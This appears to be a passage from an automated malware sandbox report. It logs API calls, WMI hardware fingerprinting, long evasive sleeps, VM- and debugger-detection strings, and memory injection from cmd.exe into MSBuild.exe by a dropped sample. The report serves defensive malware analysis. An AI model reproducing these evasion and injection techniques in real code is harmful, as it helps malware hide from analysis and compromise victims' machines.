                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1712Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00412570
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040D1C0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004015C0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411650
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B610
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040DB60
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00411B80
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D540
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004121F0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00401120 GetSystemInfo,ExitProcess,1_2_00401120
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37885
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59858
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59071
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59696
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59588
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33910
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59479
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48915
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59359
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39508
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59217
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55432
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57750
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57559
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 44022
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57416
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52492
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48862
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31123
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47980
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56792
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56671
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43905
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56546
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56436
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45398
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56305
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56198
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48249
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56089
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45598
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55984
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41526
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55874
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59534
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55764
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55654
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41943
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55546
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55437
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43762
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55327
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55218
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49672
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55107
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54757
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54878
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58269
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54765
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54641
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33748
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47834
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39808
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34516
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35748
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59284
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36799
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32306
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58881
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40674
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59684
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55447
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55111
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppData\Local\Temp\u5ek.2Jump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Microsoft Hyper-V Server
                          Source: u5ek.3.exe, 00000006.00000003.2251637614.0000000000B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Datacenter without Hyper-V Core
                          Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: QEMU_HARDU
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Standard without Hyper-V Full
                          Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Enterprise without Hyper-V Core
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942503624.000002727EC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                          Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                          Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                          Source: u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VMWARE_VIRTUAL
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1781179573.0000000005DA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5a
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "Caption": "VMware Virtual disk",
                          Source: MSBuild.exe, 0000000D.00000002.2868564782.000000000146D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: wxfSIz4PAi.exe, 00000000.00000002.1986931199.0000000005DA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr=C:\WindowsSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsE=C:\Users\userwindir=C:\WindowsIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsuser-PCUSERNAME=userUSERPR
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                          Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Standard without Hyper-V Core
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Datacenter without Hyper-V Full
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Enterprise without Hyper-V Full
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI call chain: ExitProcess graph end nodegraph_1-70413
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI call chain: ExitProcess graph end nodegraph_1-70416
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI call chain: ExitProcess graph end nodegraph_1-70434
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI call chain: ExitProcess graph end nodegraph_1-70431
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI call chain: ExitProcess graph end nodegraph_1-71449
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI call chain: ExitProcess graph end nodegraph_1-70427
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI call chain: ExitProcess graph end nodegraph_1-70457
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI call chain: ExitProcess graph end nodegraph_1-70256
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_002DD15B VirtualProtect ?,-00000001,00000104,?,?,?,000000002_2_002DD15B
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416240
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]0_2_004139E7
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_040F54B3 push dword ptr fs:[00000030h]0_2_040F54B3
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B60D90 mov eax, dword ptr fs:[00000030h]0_2_05B60D90
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B73C4E mov eax, dword ptr fs:[00000030h]0_2_05B73C4E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6092B mov eax, dword ptr fs:[00000030h]0_2_05B6092B
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]1_2_00415DC0
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_00420AEA GetProcessHeap,0_2_00420AEA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_00409C06 SetUnhandledExceptionFilter,0_2_00409C06
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EBE
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041073B
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B69CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_05B69CDA
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B69E6D SetUnhandledExceptionFilter,0_2_05B69E6D
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B709A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_05B709A2
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B6A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_05B6A125
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00419DC7 SetUnhandledExceptionFilter,1_2_00419DC7
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00417B4E
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004173DD
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBAB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6BBAB1F7
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBAB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6BBAB66C
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C93AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6C93AC62
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_002DC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002DC1FD
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_002E6678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_002E6678
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeNtSetInformationThread: Direct from: 0x6CBB617C
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeNtSetInformationThread: Direct from: 0x6C79617CJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeNtQuerySystemInformation: Direct from: 0x1D5BE4
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00415D00
                          Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A421000Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11A3008Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A421000
                          Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 12B2008
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.0.exe "C:\Users\user\AppData\Local\Temp\u5ek.0.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe" Jump to behavior
